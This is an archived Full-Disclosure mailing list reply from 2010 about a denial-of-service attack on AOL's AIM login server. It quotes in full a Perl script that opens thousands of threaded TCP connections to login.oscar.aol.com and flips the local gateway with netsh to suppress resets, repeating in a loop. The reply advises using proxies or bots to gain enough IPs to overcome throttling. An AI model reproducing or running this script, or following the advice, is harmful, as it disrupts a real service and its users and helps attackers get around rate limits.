[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] DOS AOL AIM via perl

To: Cyber Flash <cyber_flash@xxxxxxxxxxx>
Subject: Re: [Full-disclosure] DOS AOL AIM via perl
From: T Biehn <tbiehn@xxxxxxxxx>
Date: Tue, 14 Dec 2010 13:14:39 -0500

You need at minimum 2x the number of IPs your target has to take it down.
Via proxies, bots, whatever.

Targets can implement per IP throttling/blacklisting. Which means you need
more than IPs than that.

IIRC Aol throttles connection attempts.

-Travis

On Tue, Dec 14, 2010 at 10:13 AM, Cyber Flash <cyber_flash@xxxxxxxxxxx>wrote:

>   Create many ESTABLISHED connections (60,000) to login.oscar.aol.comserver
> and then temporarily disable the local client gateway, close the sockets
> (the RST packets aren’t sent to AOL), reopen the gateway and repeat this
> process.
>
>  Anyone have ideas on the pros/cons of using this technique?
>
> # Client -> Server [SYN]
> # Server -> Client [SYN, ACK]
> # Client -> Server [ACK]
> # Server -> Client 10 bytes (conn_ack)
> # Client -> Server 10 bytes (conn_ack)
> # Server -> Client [ACK]
>
> use IO::Socket;
> use Thread;
> use Win32::OLE qw(in);
>
> # --- SCRIPT CONFIGURATION ---
> my $host="login.oscar.aol.com";
> my $port=80;
>
> # --- END CONFIGURATION ---
> my $ip="";
> my $gateway="";
> my $fake_gateway="1.1.1.1";
> my $mask="";
> my $adpater="";
> my $alive=0;
>
>
> $object=Win32::OLE->GetObject('winmgmts:{impersonationLevel=impersonate}!//.');
> foreach my
> $nic(in$object->InstancesOf('Win32_NetworkAdapterConfiguration')){
>    next unless $nic->{IPEnabled};
>    $ip=@{$nic->{IPAddress}}[0];
>    $gateway=@{$nic->{DefaultIPGateway}}[0];
>    $mask=@{$nic->{IPSubnet}}[0];
>    print "IPv4 Address: $ip\nDefault Gateway: $gateway\nSubnet Mask:
> $mask\n";
>    last;
> }
>
> $objWMI = Win32::OLE->GetObject("winmgmts://./root/cimv2");
> $colNAs = $objWMI->InstancesOf('Win32_NetworkAdapter');
> foreach my $objNA (in $colNAs){
>    next unless $objNA->{NetEnabled};
>    $adapter=$objNA->NetConnectionID;
>    print "Ethernet Adapter: $adapter\n";
>    last;
> }
>
> while (1) {
>    for ($n=0;$n<=3000;$n++){
>       $thr=new Thread\&connect;
>       $thr->detach;
>       $t++;
>       print "Connection: $t\n";
>       select(undef, undef, undef, 0.25);
>    }
>    print "\nDisabling Gateway...\n";
>    system("netsh interface ip set address name=\"$adapter\" static $ip
> $mask $fake_gateway 1");
>    $alive=1;
>    sleep 3;
>    print "\nEnabling Gateway....\n";
>    system("netsh interface ip set address name=\"$adapter\" static $ip
> $mask $gateway 1");
>    $alive=0;
> }
>
> sub connect{
>   my $socket =
> IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort=>$port);
>   $socket->recv($data,10);
>   $socket->send($data);
>   while ($alive==0) {sleep 1;}
> }
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] DOS AOL AIM via perl
  - From: Cyber Flash

Prev by Date: [Full-disclosure] PR10-10 Various Cross-Site Scripting Vulnerabilities (XSS) within BlogCFC
Next by Date: [Full-disclosure] USBsploit 0.5b - added: Railgun[only] - process migration - EXE, PDF, LNK replacements - split usbsploit.rb
Previous by thread: [Full-disclosure] DOS AOL AIM via perl
Next by thread: [Full-disclosure] PR10-10 Various Cross-Site Scripting Vulnerabilities (XSS) within BlogCFC
Index(es):
- Date
- Thread